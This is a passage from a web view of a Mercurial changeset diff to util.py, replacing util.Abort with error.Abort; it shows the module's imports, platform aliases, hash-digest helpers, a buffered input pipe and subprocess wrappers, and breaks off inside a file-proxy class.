##// END OF EJS Templates
util: drop util.Abort in favor of error.Abort (API)...
Yuya Nishihara -
r37116:a9ea2b1e default
parent child Browse files
Show More
@@ -1,4094 +1,4092
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import imp
25 import imp
26 import io
26 import io
27 import itertools
27 import itertools
28 import mmap
28 import mmap
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import subprocess
36 import subprocess
37 import sys
37 import sys
38 import tempfile
38 import tempfile
39 import time
39 import time
40 import traceback
40 import traceback
41 import warnings
41 import warnings
42 import zlib
42 import zlib
43
43
44 from . import (
44 from . import (
45 encoding,
45 encoding,
46 error,
46 error,
47 i18n,
47 i18n,
48 node as nodemod,
48 node as nodemod,
49 policy,
49 policy,
50 pycompat,
50 pycompat,
51 urllibcompat,
51 urllibcompat,
52 )
52 )
53 from .utils import (
53 from .utils import (
54 dateutil,
54 dateutil,
55 stringutil,
55 stringutil,
56 )
56 )
57
57
58 base85 = policy.importmod(r'base85')
58 base85 = policy.importmod(r'base85')
59 osutil = policy.importmod(r'osutil')
59 osutil = policy.importmod(r'osutil')
60 parsers = policy.importmod(r'parsers')
60 parsers = policy.importmod(r'parsers')
61
61
62 b85decode = base85.b85decode
62 b85decode = base85.b85decode
63 b85encode = base85.b85encode
63 b85encode = base85.b85encode
64
64
65 cookielib = pycompat.cookielib
65 cookielib = pycompat.cookielib
66 empty = pycompat.empty
66 empty = pycompat.empty
67 httplib = pycompat.httplib
67 httplib = pycompat.httplib
68 pickle = pycompat.pickle
68 pickle = pycompat.pickle
69 queue = pycompat.queue
69 queue = pycompat.queue
70 socketserver = pycompat.socketserver
70 socketserver = pycompat.socketserver
71 stderr = pycompat.stderr
71 stderr = pycompat.stderr
72 stdin = pycompat.stdin
72 stdin = pycompat.stdin
73 stdout = pycompat.stdout
73 stdout = pycompat.stdout
74 bytesio = pycompat.bytesio
74 bytesio = pycompat.bytesio
75 # TODO deprecate stringio name, as it is a lie on Python 3.
75 # TODO deprecate stringio name, as it is a lie on Python 3.
76 stringio = bytesio
76 stringio = bytesio
77 xmlrpclib = pycompat.xmlrpclib
77 xmlrpclib = pycompat.xmlrpclib
78
78
79 httpserver = urllibcompat.httpserver
79 httpserver = urllibcompat.httpserver
80 urlerr = urllibcompat.urlerr
80 urlerr = urllibcompat.urlerr
81 urlreq = urllibcompat.urlreq
81 urlreq = urllibcompat.urlreq
82
82
83 # workaround for win32mbcs
83 # workaround for win32mbcs
84 _filenamebytestr = pycompat.bytestr
84 _filenamebytestr = pycompat.bytestr
85
85
86 def isatty(fp):
86 def isatty(fp):
87 try:
87 try:
88 return fp.isatty()
88 return fp.isatty()
89 except AttributeError:
89 except AttributeError:
90 return False
90 return False
91
91
92 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # glibc determines buffering on first write to stdout - if we replace a TTY
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # destined stdout with a pipe destined stdout (e.g. pager), we want line
94 # buffering
94 # buffering
95 if isatty(stdout):
95 if isatty(stdout):
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
96 stdout = os.fdopen(stdout.fileno(), r'wb', 1)
97
97
98 if pycompat.iswindows:
98 if pycompat.iswindows:
99 from . import windows as platform
99 from . import windows as platform
100 stdout = platform.winstdout(stdout)
100 stdout = platform.winstdout(stdout)
101 else:
101 else:
102 from . import posix as platform
102 from . import posix as platform
103
103
104 _ = i18n._
104 _ = i18n._
105
105
106 bindunixsocket = platform.bindunixsocket
106 bindunixsocket = platform.bindunixsocket
107 cachestat = platform.cachestat
107 cachestat = platform.cachestat
108 checkexec = platform.checkexec
108 checkexec = platform.checkexec
109 checklink = platform.checklink
109 checklink = platform.checklink
110 copymode = platform.copymode
110 copymode = platform.copymode
111 expandglobs = platform.expandglobs
111 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
112 explainexit = platform.explainexit
113 findexe = platform.findexe
113 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
114 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
115 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
116 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
117 getuser = platform.getuser
118 getpid = os.getpid
118 getpid = os.getpid
119 groupmembers = platform.groupmembers
119 groupmembers = platform.groupmembers
120 groupname = platform.groupname
120 groupname = platform.groupname
121 hidewindow = platform.hidewindow
121 hidewindow = platform.hidewindow
122 isexec = platform.isexec
122 isexec = platform.isexec
123 isowner = platform.isowner
123 isowner = platform.isowner
124 listdir = osutil.listdir
124 listdir = osutil.listdir
125 localpath = platform.localpath
125 localpath = platform.localpath
126 lookupreg = platform.lookupreg
126 lookupreg = platform.lookupreg
127 makedir = platform.makedir
127 makedir = platform.makedir
128 nlinks = platform.nlinks
128 nlinks = platform.nlinks
129 normpath = platform.normpath
129 normpath = platform.normpath
130 normcase = platform.normcase
130 normcase = platform.normcase
131 normcasespec = platform.normcasespec
131 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
132 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
133 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
134 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
135 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
136 pconvert = platform.pconvert
137 poll = platform.poll
137 poll = platform.poll
138 popen = platform.popen
138 popen = platform.popen
139 posixfile = platform.posixfile
139 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
140 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
141 readpipe = platform.readpipe
142 rename = platform.rename
142 rename = platform.rename
143 removedirs = platform.removedirs
143 removedirs = platform.removedirs
144 samedevice = platform.samedevice
144 samedevice = platform.samedevice
145 samefile = platform.samefile
145 samefile = platform.samefile
146 samestat = platform.samestat
146 samestat = platform.samestat
147 setbinary = platform.setbinary
147 setbinary = platform.setbinary
148 setflags = platform.setflags
148 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
149 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
150 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
151 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
152 spawndetached = platform.spawndetached
153 split = platform.split
153 split = platform.split
154 sshargs = platform.sshargs
154 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
156 statisexec = platform.statisexec
157 statislink = platform.statislink
157 statislink = platform.statislink
158 testpid = platform.testpid
158 testpid = platform.testpid
159 umask = platform.umask
159 umask = platform.umask
160 unlink = platform.unlink
160 unlink = platform.unlink
161 username = platform.username
161 username = platform.username
162
162
163 try:
163 try:
164 recvfds = osutil.recvfds
164 recvfds = osutil.recvfds
165 except AttributeError:
165 except AttributeError:
166 pass
166 pass
167 try:
167 try:
168 setprocname = osutil.setprocname
168 setprocname = osutil.setprocname
169 except AttributeError:
169 except AttributeError:
170 pass
170 pass
171 try:
171 try:
172 unblocksignal = osutil.unblocksignal
172 unblocksignal = osutil.unblocksignal
173 except AttributeError:
173 except AttributeError:
174 pass
174 pass
175
175
176 # Python compatibility
176 # Python compatibility
177
177
178 _notset = object()
178 _notset = object()
179
179
180 def safehasattr(thing, attr):
180 def safehasattr(thing, attr):
181 return getattr(thing, attr, _notset) is not _notset
181 return getattr(thing, attr, _notset) is not _notset
182
182
183 def _rapply(f, xs):
183 def _rapply(f, xs):
184 if xs is None:
184 if xs is None:
185 # assume None means non-value of optional data
185 # assume None means non-value of optional data
186 return xs
186 return xs
187 if isinstance(xs, (list, set, tuple)):
187 if isinstance(xs, (list, set, tuple)):
188 return type(xs)(_rapply(f, x) for x in xs)
188 return type(xs)(_rapply(f, x) for x in xs)
189 if isinstance(xs, dict):
189 if isinstance(xs, dict):
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
190 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
191 return f(xs)
191 return f(xs)
192
192
193 def rapply(f, xs):
193 def rapply(f, xs):
194 """Apply function recursively to every item preserving the data structure
194 """Apply function recursively to every item preserving the data structure
195
195
196 >>> def f(x):
196 >>> def f(x):
197 ... return 'f(%s)' % x
197 ... return 'f(%s)' % x
198 >>> rapply(f, None) is None
198 >>> rapply(f, None) is None
199 True
199 True
200 >>> rapply(f, 'a')
200 >>> rapply(f, 'a')
201 'f(a)'
201 'f(a)'
202 >>> rapply(f, {'a'}) == {'f(a)'}
202 >>> rapply(f, {'a'}) == {'f(a)'}
203 True
203 True
204 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
204 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
205 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
205 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
206
206
207 >>> xs = [object()]
207 >>> xs = [object()]
208 >>> rapply(pycompat.identity, xs) is xs
208 >>> rapply(pycompat.identity, xs) is xs
209 True
209 True
210 """
210 """
211 if f is pycompat.identity:
211 if f is pycompat.identity:
212 # fast path mainly for py2
212 # fast path mainly for py2
213 return xs
213 return xs
214 return _rapply(f, xs)
214 return _rapply(f, xs)
215
215
216 def bitsfrom(container):
216 def bitsfrom(container):
217 bits = 0
217 bits = 0
218 for bit in container:
218 for bit in container:
219 bits |= bit
219 bits |= bit
220 return bits
220 return bits
221
221
222 # python 2.6 still have deprecation warning enabled by default. We do not want
222 # python 2.6 still have deprecation warning enabled by default. We do not want
223 # to display anything to standard user so detect if we are running test and
223 # to display anything to standard user so detect if we are running test and
224 # only use python deprecation warning in this case.
224 # only use python deprecation warning in this case.
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
225 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
226 if _dowarn:
226 if _dowarn:
227 # explicitly unfilter our warning for python 2.7
227 # explicitly unfilter our warning for python 2.7
228 #
228 #
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
229 # The option of setting PYTHONWARNINGS in the test runner was investigated.
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
230 # However, module name set through PYTHONWARNINGS was exactly matched, so
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
231 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
232 # makes the whole PYTHONWARNINGS thing useless for our usecase.
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
233 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
234 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
235 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
236 if _dowarn and pycompat.ispy3:
236 if _dowarn and pycompat.ispy3:
237 # silence warning emitted by passing user string to re.sub()
237 # silence warning emitted by passing user string to re.sub()
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
238 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
239 r'mercurial')
239 r'mercurial')
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
240 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
241 DeprecationWarning, r'mercurial')
241 DeprecationWarning, r'mercurial')
242
242
243 def nouideprecwarn(msg, version, stacklevel=1):
243 def nouideprecwarn(msg, version, stacklevel=1):
244 """Issue an python native deprecation warning
244 """Issue an python native deprecation warning
245
245
246 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
246 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
247 """
247 """
248 if _dowarn:
248 if _dowarn:
249 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
249 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
250 " update your code.)") % version
250 " update your code.)") % version
251 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
251 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
252
252
253 DIGESTS = {
253 DIGESTS = {
254 'md5': hashlib.md5,
254 'md5': hashlib.md5,
255 'sha1': hashlib.sha1,
255 'sha1': hashlib.sha1,
256 'sha512': hashlib.sha512,
256 'sha512': hashlib.sha512,
257 }
257 }
258 # List of digest types from strongest to weakest
258 # List of digest types from strongest to weakest
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
259 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
260
260
261 for k in DIGESTS_BY_STRENGTH:
261 for k in DIGESTS_BY_STRENGTH:
262 assert k in DIGESTS
262 assert k in DIGESTS
263
263
264 class digester(object):
264 class digester(object):
265 """helper to compute digests.
265 """helper to compute digests.
266
266
267 This helper can be used to compute one or more digests given their name.
267 This helper can be used to compute one or more digests given their name.
268
268
269 >>> d = digester([b'md5', b'sha1'])
269 >>> d = digester([b'md5', b'sha1'])
270 >>> d.update(b'foo')
270 >>> d.update(b'foo')
271 >>> [k for k in sorted(d)]
271 >>> [k for k in sorted(d)]
272 ['md5', 'sha1']
272 ['md5', 'sha1']
273 >>> d[b'md5']
273 >>> d[b'md5']
274 'acbd18db4cc2f85cedef654fccc4a4d8'
274 'acbd18db4cc2f85cedef654fccc4a4d8'
275 >>> d[b'sha1']
275 >>> d[b'sha1']
276 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
276 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
277 >>> digester.preferred([b'md5', b'sha1'])
277 >>> digester.preferred([b'md5', b'sha1'])
278 'sha1'
278 'sha1'
279 """
279 """
280
280
281 def __init__(self, digests, s=''):
281 def __init__(self, digests, s=''):
282 self._hashes = {}
282 self._hashes = {}
283 for k in digests:
283 for k in digests:
284 if k not in DIGESTS:
284 if k not in DIGESTS:
285 raise error.Abort(_('unknown digest type: %s') % k)
285 raise error.Abort(_('unknown digest type: %s') % k)
286 self._hashes[k] = DIGESTS[k]()
286 self._hashes[k] = DIGESTS[k]()
287 if s:
287 if s:
288 self.update(s)
288 self.update(s)
289
289
290 def update(self, data):
290 def update(self, data):
291 for h in self._hashes.values():
291 for h in self._hashes.values():
292 h.update(data)
292 h.update(data)
293
293
294 def __getitem__(self, key):
294 def __getitem__(self, key):
295 if key not in DIGESTS:
295 if key not in DIGESTS:
296 raise error.Abort(_('unknown digest type: %s') % k)
296 raise error.Abort(_('unknown digest type: %s') % k)
297 return nodemod.hex(self._hashes[key].digest())
297 return nodemod.hex(self._hashes[key].digest())
298
298
299 def __iter__(self):
299 def __iter__(self):
300 return iter(self._hashes)
300 return iter(self._hashes)
301
301
302 @staticmethod
302 @staticmethod
303 def preferred(supported):
303 def preferred(supported):
304 """returns the strongest digest type in both supported and DIGESTS."""
304 """returns the strongest digest type in both supported and DIGESTS."""
305
305
306 for k in DIGESTS_BY_STRENGTH:
306 for k in DIGESTS_BY_STRENGTH:
307 if k in supported:
307 if k in supported:
308 return k
308 return k
309 return None
309 return None
310
310
311 class digestchecker(object):
311 class digestchecker(object):
312 """file handle wrapper that additionally checks content against a given
312 """file handle wrapper that additionally checks content against a given
313 size and digests.
313 size and digests.
314
314
315 d = digestchecker(fh, size, {'md5': '...'})
315 d = digestchecker(fh, size, {'md5': '...'})
316
316
317 When multiple digests are given, all of them are validated.
317 When multiple digests are given, all of them are validated.
318 """
318 """
319
319
320 def __init__(self, fh, size, digests):
320 def __init__(self, fh, size, digests):
321 self._fh = fh
321 self._fh = fh
322 self._size = size
322 self._size = size
323 self._got = 0
323 self._got = 0
324 self._digests = dict(digests)
324 self._digests = dict(digests)
325 self._digester = digester(self._digests.keys())
325 self._digester = digester(self._digests.keys())
326
326
327 def read(self, length=-1):
327 def read(self, length=-1):
328 content = self._fh.read(length)
328 content = self._fh.read(length)
329 self._digester.update(content)
329 self._digester.update(content)
330 self._got += len(content)
330 self._got += len(content)
331 return content
331 return content
332
332
333 def validate(self):
333 def validate(self):
334 if self._size != self._got:
334 if self._size != self._got:
335 raise error.Abort(_('size mismatch: expected %d, got %d') %
335 raise error.Abort(_('size mismatch: expected %d, got %d') %
336 (self._size, self._got))
336 (self._size, self._got))
337 for k, v in self._digests.items():
337 for k, v in self._digests.items():
338 if v != self._digester[k]:
338 if v != self._digester[k]:
339 # i18n: first parameter is a digest name
339 # i18n: first parameter is a digest name
340 raise error.Abort(_('%s mismatch: expected %s, got %s') %
340 raise error.Abort(_('%s mismatch: expected %s, got %s') %
341 (k, v, self._digester[k]))
341 (k, v, self._digester[k]))
342
342
343 try:
343 try:
344 buffer = buffer
344 buffer = buffer
345 except NameError:
345 except NameError:
346 def buffer(sliceable, offset=0, length=None):
346 def buffer(sliceable, offset=0, length=None):
347 if length is not None:
347 if length is not None:
348 return memoryview(sliceable)[offset:offset + length]
348 return memoryview(sliceable)[offset:offset + length]
349 return memoryview(sliceable)[offset:]
349 return memoryview(sliceable)[offset:]
350
350
351 closefds = pycompat.isposix
351 closefds = pycompat.isposix
352
352
353 _chunksize = 4096
353 _chunksize = 4096
354
354
355 class bufferedinputpipe(object):
355 class bufferedinputpipe(object):
356 """a manually buffered input pipe
356 """a manually buffered input pipe
357
357
358 Python will not let us use buffered IO and lazy reading with 'polling' at
358 Python will not let us use buffered IO and lazy reading with 'polling' at
359 the same time. We cannot probe the buffer state and select will not detect
359 the same time. We cannot probe the buffer state and select will not detect
360 that data are ready to read if they are already buffered.
360 that data are ready to read if they are already buffered.
361
361
362 This class let us work around that by implementing its own buffering
362 This class let us work around that by implementing its own buffering
363 (allowing efficient readline) while offering a way to know if the buffer is
363 (allowing efficient readline) while offering a way to know if the buffer is
364 empty from the output (allowing collaboration of the buffer with polling).
364 empty from the output (allowing collaboration of the buffer with polling).
365
365
366 This class lives in the 'util' module because it makes use of the 'os'
366 This class lives in the 'util' module because it makes use of the 'os'
367 module from the python stdlib.
367 module from the python stdlib.
368 """
368 """
369 def __new__(cls, fh):
369 def __new__(cls, fh):
370 # If we receive a fileobjectproxy, we need to use a variation of this
370 # If we receive a fileobjectproxy, we need to use a variation of this
371 # class that notifies observers about activity.
371 # class that notifies observers about activity.
372 if isinstance(fh, fileobjectproxy):
372 if isinstance(fh, fileobjectproxy):
373 cls = observedbufferedinputpipe
373 cls = observedbufferedinputpipe
374
374
375 return super(bufferedinputpipe, cls).__new__(cls)
375 return super(bufferedinputpipe, cls).__new__(cls)
376
376
377 def __init__(self, input):
377 def __init__(self, input):
378 self._input = input
378 self._input = input
379 self._buffer = []
379 self._buffer = []
380 self._eof = False
380 self._eof = False
381 self._lenbuf = 0
381 self._lenbuf = 0
382
382
383 @property
383 @property
384 def hasbuffer(self):
384 def hasbuffer(self):
385 """True is any data is currently buffered
385 """True is any data is currently buffered
386
386
387 This will be used externally a pre-step for polling IO. If there is
387 This will be used externally a pre-step for polling IO. If there is
388 already data then no polling should be set in place."""
388 already data then no polling should be set in place."""
389 return bool(self._buffer)
389 return bool(self._buffer)
390
390
391 @property
391 @property
392 def closed(self):
392 def closed(self):
393 return self._input.closed
393 return self._input.closed
394
394
395 def fileno(self):
395 def fileno(self):
396 return self._input.fileno()
396 return self._input.fileno()
397
397
398 def close(self):
398 def close(self):
399 return self._input.close()
399 return self._input.close()
400
400
401 def read(self, size):
401 def read(self, size):
402 while (not self._eof) and (self._lenbuf < size):
402 while (not self._eof) and (self._lenbuf < size):
403 self._fillbuffer()
403 self._fillbuffer()
404 return self._frombuffer(size)
404 return self._frombuffer(size)
405
405
406 def readline(self, *args, **kwargs):
406 def readline(self, *args, **kwargs):
407 if 1 < len(self._buffer):
407 if 1 < len(self._buffer):
408 # this should not happen because both read and readline end with a
408 # this should not happen because both read and readline end with a
409 # _frombuffer call that collapse it.
409 # _frombuffer call that collapse it.
410 self._buffer = [''.join(self._buffer)]
410 self._buffer = [''.join(self._buffer)]
411 self._lenbuf = len(self._buffer[0])
411 self._lenbuf = len(self._buffer[0])
412 lfi = -1
412 lfi = -1
413 if self._buffer:
413 if self._buffer:
414 lfi = self._buffer[-1].find('\n')
414 lfi = self._buffer[-1].find('\n')
415 while (not self._eof) and lfi < 0:
415 while (not self._eof) and lfi < 0:
416 self._fillbuffer()
416 self._fillbuffer()
417 if self._buffer:
417 if self._buffer:
418 lfi = self._buffer[-1].find('\n')
418 lfi = self._buffer[-1].find('\n')
419 size = lfi + 1
419 size = lfi + 1
420 if lfi < 0: # end of file
420 if lfi < 0: # end of file
421 size = self._lenbuf
421 size = self._lenbuf
422 elif 1 < len(self._buffer):
422 elif 1 < len(self._buffer):
423 # we need to take previous chunks into account
423 # we need to take previous chunks into account
424 size += self._lenbuf - len(self._buffer[-1])
424 size += self._lenbuf - len(self._buffer[-1])
425 return self._frombuffer(size)
425 return self._frombuffer(size)
426
426
427 def _frombuffer(self, size):
427 def _frombuffer(self, size):
428 """return at most 'size' data from the buffer
428 """return at most 'size' data from the buffer
429
429
430 The data are removed from the buffer."""
430 The data are removed from the buffer."""
431 if size == 0 or not self._buffer:
431 if size == 0 or not self._buffer:
432 return ''
432 return ''
433 buf = self._buffer[0]
433 buf = self._buffer[0]
434 if 1 < len(self._buffer):
434 if 1 < len(self._buffer):
435 buf = ''.join(self._buffer)
435 buf = ''.join(self._buffer)
436
436
437 data = buf[:size]
437 data = buf[:size]
438 buf = buf[len(data):]
438 buf = buf[len(data):]
439 if buf:
439 if buf:
440 self._buffer = [buf]
440 self._buffer = [buf]
441 self._lenbuf = len(buf)
441 self._lenbuf = len(buf)
442 else:
442 else:
443 self._buffer = []
443 self._buffer = []
444 self._lenbuf = 0
444 self._lenbuf = 0
445 return data
445 return data
446
446
447 def _fillbuffer(self):
447 def _fillbuffer(self):
448 """read data to the buffer"""
448 """read data to the buffer"""
449 data = os.read(self._input.fileno(), _chunksize)
449 data = os.read(self._input.fileno(), _chunksize)
450 if not data:
450 if not data:
451 self._eof = True
451 self._eof = True
452 else:
452 else:
453 self._lenbuf += len(data)
453 self._lenbuf += len(data)
454 self._buffer.append(data)
454 self._buffer.append(data)
455
455
456 return data
456 return data
457
457
458 def mmapread(fp):
458 def mmapread(fp):
459 try:
459 try:
460 fd = getattr(fp, 'fileno', lambda: fp)()
460 fd = getattr(fp, 'fileno', lambda: fp)()
461 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
461 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
462 except ValueError:
462 except ValueError:
463 # Empty files cannot be mmapped, but mmapread should still work. Check
463 # Empty files cannot be mmapped, but mmapread should still work. Check
464 # if the file is empty, and if so, return an empty buffer.
464 # if the file is empty, and if so, return an empty buffer.
465 if os.fstat(fd).st_size == 0:
465 if os.fstat(fd).st_size == 0:
466 return ''
466 return ''
467 raise
467 raise
468
468
469 def popen2(cmd, env=None, newlines=False):
469 def popen2(cmd, env=None, newlines=False):
470 # Setting bufsize to -1 lets the system decide the buffer size.
470 # Setting bufsize to -1 lets the system decide the buffer size.
471 # The default for bufsize is 0, meaning unbuffered. This leads to
471 # The default for bufsize is 0, meaning unbuffered. This leads to
472 # poor performance on Mac OS X: http://bugs.python.org/issue4194
472 # poor performance on Mac OS X: http://bugs.python.org/issue4194
473 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
473 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
474 close_fds=closefds,
474 close_fds=closefds,
475 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
475 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
476 universal_newlines=newlines,
476 universal_newlines=newlines,
477 env=env)
477 env=env)
478 return p.stdin, p.stdout
478 return p.stdin, p.stdout
479
479
480 def popen3(cmd, env=None, newlines=False):
480 def popen3(cmd, env=None, newlines=False):
481 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
481 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
482 return stdin, stdout, stderr
482 return stdin, stdout, stderr
483
483
484 def popen4(cmd, env=None, newlines=False, bufsize=-1):
484 def popen4(cmd, env=None, newlines=False, bufsize=-1):
485 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
485 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
486 close_fds=closefds,
486 close_fds=closefds,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
488 stderr=subprocess.PIPE,
488 stderr=subprocess.PIPE,
489 universal_newlines=newlines,
489 universal_newlines=newlines,
490 env=env)
490 env=env)
491 return p.stdin, p.stdout, p.stderr, p
491 return p.stdin, p.stdout, p.stderr, p
492
492
493 class fileobjectproxy(object):
493 class fileobjectproxy(object):
494 """A proxy around file objects that tells a watcher when events occur.
494 """A proxy around file objects that tells a watcher when events occur.
495
495
496 This type is intended to only be used for testing purposes. Think hard
496 This type is intended to only be used for testing purposes. Think hard
497 before using it in important code.
497 before using it in important code.
498 """
498 """
499 __slots__ = (
499 __slots__ = (
500 r'_orig',
500 r'_orig',
501 r'_observer',
501 r'_observer',
502 )
502 )
503
503
504 def __init__(self, fh, observer):
504 def __init__(self, fh, observer):
505 object.__setattr__(self, r'_orig', fh)
505 object.__setattr__(self, r'_orig', fh)
506 object.__setattr__(self, r'_observer', observer)
506 object.__setattr__(self, r'_observer', observer)
507
507
508 def __getattribute__(self, name):
508 def __getattribute__(self, name):
509 ours = {
509 ours = {
510 r'_observer',
510 r'_observer',
511
511
512 # IOBase
512 # IOBase
513 r'close',
513 r'close',
514 # closed if a property
514 # closed if a property
515 r'fileno',
515 r'fileno',
516 r'flush',
516 r'flush',
517 r'isatty',
517 r'isatty',
518 r'readable',
518 r'readable',
519 r'readline',
519 r'readline',
520 r'readlines',
520 r'readlines',
521 r'seek',
521 r'seek',
522 r'seekable',
522 r'seekable',
523 r'tell',
523 r'tell',
524 r'truncate',
524 r'truncate',
525 r'writable',
525 r'writable',
526 r'writelines',
526 r'writelines',
527 # RawIOBase
527 # RawIOBase
528 r'read',
528 r'read',
529 r'readall',
529 r'readall',
530 r'readinto',
530 r'readinto',
531 r'write',
531 r'write',
532 # BufferedIOBase
532 # BufferedIOBase
533 # raw is a property
533 # raw is a property
534 r'detach',
534 r'detach',
535 # read defined above
535 # read defined above
536 r'read1',
536 r'read1',
537 # readinto defined above
537 # readinto defined above
538 # write defined above
538 # write defined above
539 }
539 }
540
540
541 # We only observe some methods.
541 # We only observe some methods.
542 if name in ours:
542 if name in ours:
543 return object.__getattribute__(self, name)
543 return object.__getattribute__(self, name)
544
544
545 return getattr(object.__getattribute__(self, r'_orig'), name)
545 return getattr(object.__getattribute__(self, r'_orig'), name)
546
546
547 def __nonzero__(self):
547 def __nonzero__(self):
548 return bool(object.__getattribute__(self, r'_orig'))
548 return bool(object.__getattribute__(self, r'_orig'))
549
549
550 __bool__ = __nonzero__
550 __bool__ = __nonzero__
551
551
552 def __delattr__(self, name):
552 def __delattr__(self, name):
553 return delattr(object.__getattribute__(self, r'_orig'), name)
553 return delattr(object.__getattribute__(self, r'_orig'), name)
554
554
555 def __setattr__(self, name, value):
555 def __setattr__(self, name, value):
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
556 return setattr(object.__getattribute__(self, r'_orig'), name, value)
557
557
558 def __iter__(self):
558 def __iter__(self):
559 return object.__getattribute__(self, r'_orig').__iter__()
559 return object.__getattribute__(self, r'_orig').__iter__()
560
560
561 def _observedcall(self, name, *args, **kwargs):
561 def _observedcall(self, name, *args, **kwargs):
562 # Call the original object.
562 # Call the original object.
563 orig = object.__getattribute__(self, r'_orig')
563 orig = object.__getattribute__(self, r'_orig')
564 res = getattr(orig, name)(*args, **kwargs)
564 res = getattr(orig, name)(*args, **kwargs)
565
565
566 # Call a method on the observer of the same name with arguments
566 # Call a method on the observer of the same name with arguments
567 # so it can react, log, etc.
567 # so it can react, log, etc.
568 observer = object.__getattribute__(self, r'_observer')
568 observer = object.__getattribute__(self, r'_observer')
569 fn = getattr(observer, name, None)
569 fn = getattr(observer, name, None)
570 if fn:
570 if fn:
571 fn(res, *args, **kwargs)
571 fn(res, *args, **kwargs)
572
572
573 return res
573 return res
574
574
575 def close(self, *args, **kwargs):
575 def close(self, *args, **kwargs):
